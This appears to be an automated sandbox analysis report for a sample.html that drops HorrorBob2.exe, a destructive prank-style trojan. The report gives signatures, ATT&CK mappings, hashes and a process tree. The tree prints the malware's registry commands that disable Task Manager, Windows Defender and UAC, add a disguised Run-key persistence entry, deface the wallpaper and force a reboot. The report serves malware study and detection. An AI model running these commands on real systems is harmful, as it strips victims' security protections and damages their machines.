9f30928da3935effb34958309bde750c2033d654e83ea7d5f3ce0744c93d3457

Resubmissions

01/05/2024, 13:54

240501-q7rhtsgc6w 1

01/05/2024, 13:51

240501-q53hbagc31 10

01/05/2024, 13:38

240501-qxqtjsab54 8

Analysis

max time kernel
100s
max time network
101s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
01/05/2024, 13:51

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

sample.html
Size

20KB
MD5

ac97af0819965dbbaaf75920356f702a
SHA1

8637b8be2516e18d7e6be8b3984a9ae339e88dde
SHA256

9f30928da3935effb34958309bde750c2033d654e83ea7d5f3ce0744c93d3457
SHA512

f1898c86a9f5d62e5b29977c00d5ae43854531f81b85df021fe61601753524ab95912631e128a84ab49af5e6da5c9cc4388a48b56662470b150285da294dceda
SSDEEP

384:rGfdCkDpmReVoOs4si9ylKeGMkUxOHhhbYhS7+S2LjMrSG+0IJCgMmVn:rGfxBVoOs4smyI1MbOBhbw0yMrSBJ2mV

Score

10^/10

evasion persistence ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
3776	HorrorBob2.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000700000001acff-321.dat	upx
behavioral1/memory/3776-358-0x0000000000400000-0x000000000132F000-memory.dmp	upx
behavioral1/files/0x000700000001ad03-373.dat	upx
behavioral1/memory/3776-388-0x0000000000400000-0x000000000132F000-memory.dmp	upx

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
56	raw.githubusercontent.com
57	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133590451105851817"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1"	LogonUI.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
2632	reg.exe
748	reg.exe
2908	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4112	chrome.exe
4112	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe
Token: SeShutdownPrivilege	4112	chrome.exe
Token: SeCreatePagefilePrivilege	4112	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe
4112	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5036	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4112 wrote to memory of 704	4112	chrome.exe	73
PID 4112 wrote to memory of 704	4112	chrome.exe	73
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 392	4112	chrome.exe	75
PID 4112 wrote to memory of 4496	4112	chrome.exe	76
PID 4112 wrote to memory of 4496	4112	chrome.exe	76
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77
PID 4112 wrote to memory of 2924	4112	chrome.exe	77

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument C:\Users\Admin\AppData\Local\Temp\sample.html
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fff530c9758,0x7fff530c9768,0x7fff530c9778
  2⤵
  PID:704
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1520 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:2
  2⤵
  PID:392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1896 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:4496
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2060 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:2924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2852 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:1
  2⤵
  PID:2780
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2860 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:1
  2⤵
  PID:880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4120 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:1856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4224 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2460 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:1
  2⤵
  PID:4380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4272 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=692 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:1
  2⤵
  PID:904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4772 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:4256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3944 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5360 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5600 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:224
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4824 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:2196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5468 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:1172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5804 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:3168
- C:\Users\Admin\Downloads\HorrorBob2.exe
  "C:\Users\Admin\Downloads\HorrorBob2.exe"
  2⤵
  - Executes dropped EXE
  PID:3776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E1A1.tmp\HorrorBob2.bat" "
    3⤵
    PID:1284
  - - C:\Windows\SysWOW64\cscript.exe
      cscript prompt.vbs
      4⤵
      PID:640
  - - C:\Windows\SysWOW64\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:2632
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f
      4⤵
      Sets desktop wallpaper using registry
      PID:4344
  - - C:\Windows\SysWOW64\rundll32.exe
      RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
      4⤵
      PID:3624
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:748
  - - C:\Windows\SysWOW64\reg.exe
      Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      PID:3560
  - - C:\Windows\SysWOW64\reg.exe
      reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      UAC bypass
      Modifies registry key
      PID:2908
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"
      4⤵
      Adds Run key to start application
      PID:2904
  - - C:\Windows\SysWOW64\net.exe
      net user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
      4⤵
      PID:2112
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"
        5⤵
        
        PID:168
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown /r /t 00
      4⤵
      PID:3344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5536 --field-trial-handle=1764,i,6674583980170292932,11022753200040794364,131072 /prefetch:8
  2⤵
  PID:1996

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3804

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3aec055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
9554cb1c47c5db2236aa9da9c6cd4264

SHA1
5ac97ecf3617e98399c5593878d7d263b4c1e614

SHA256
eec5f8de5c1078d2cc32b5c3b00b10570d90a648e6f792eee65f44da83912df6

SHA512
08e9e5763f084ef9a8e6b828f088e4d7293a896f694a082cc61218479faf87aff0623564a78970806f89fecb1f53d0ab1c76110483819292c23ab8ed2f911686

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
750e17244565d3962387d6593ec020f5

SHA1
977a4ca90905e072b0dd920ec681d7371c3e38a5

SHA256
5eaa54426f00cd4f453de83b4624f43453e35a1543478d734e3b2b3679705de6

SHA512
f38c0130656deb508351d3c4d97ff5cf6413cc524292f9d49ed8cff21b76d0f69399e11498cbe298d5cf69bf53f73e35744867841470754b64c99cf2becff425

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
369B

MD5
61be447798b33e71f65abcbc1b53e5d8

SHA1
dfe858c840d6ecbc65dc2970b1a727bff3bf0ad4

SHA256
30178dceadd72ba0087e44f60298fd15af28b7c0cca6bb4feddfed26c19d8d0f

SHA512
9727a54c38770567a58f18b3c3b85976bbc76940cecf81615d295dfe8877b3364af928602d4e7067f76851446f80b06ca231e9f36ffcffdff2b3fdda3b42c7cd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
5c864eea8428371f071008638b125031

SHA1
f49d2948c16df860d61d944d42fc874c0777bc56

SHA256
cdabafa1edbd04d411bff9d590fa5774b7d6bf9594df17033d6801a2197d67ec

SHA512
4284c78a9b9dd1aa981818039990ffdeefcd2ed6d4d1ee7418221aa578268211cfad331146b16143ff5d0826563db29211e1aee6df4b6ac26ff4f6b7e87d0f4e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
5KB

MD5
d4d291efba43d5e17dd3f083199cf43c

SHA1
36855850d5c39b499d9c48a85621367ac0d0a0c6

SHA256
181256238a492ce1efebdd1711e4c0deacd6be142da6bae410e59502487721c2

SHA512
232993c574a65b776c9036aca32e7f10ce790ba0c7163e9e89561836130956c0b59f134304b58213969969faba202e358ed5bf69b26b6512a208b121945b36be

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
cb0e2ea50e61646c6a1df4c52bded8d7

SHA1
656382987239ead77e026b0aecd89f2faa7af239

SHA256
a781e49f449aef9863c0242e898e27c9234ee44e91bfee0c747bc602ae460fa0

SHA512
3c064af6dd49cfc2e18eda4b14720db2d80c83a262f9ecb92a9a1184fad631aad21e66e321d23a8e0df90735b1fa19364446fa3af5363e5f28a2b504ee3b8361

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
148a09f8a84fb2aa2734bd0b51ee8e56

SHA1
d45c514f67f8e0bca40cbcd0989360ad43ca6823

SHA256
2eb40e583beecb276b1f1a62d4614e6fe01c16498ca246e968720a790a44734c

SHA512
982a19e6afa96938c503665397b29c2d8872e54ff93f35e0bd1ae48eb3705713da4df68ca61e6b988e8bbc1c3d3956fa50551da9def64d51f9a8d4577ab2eaaa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
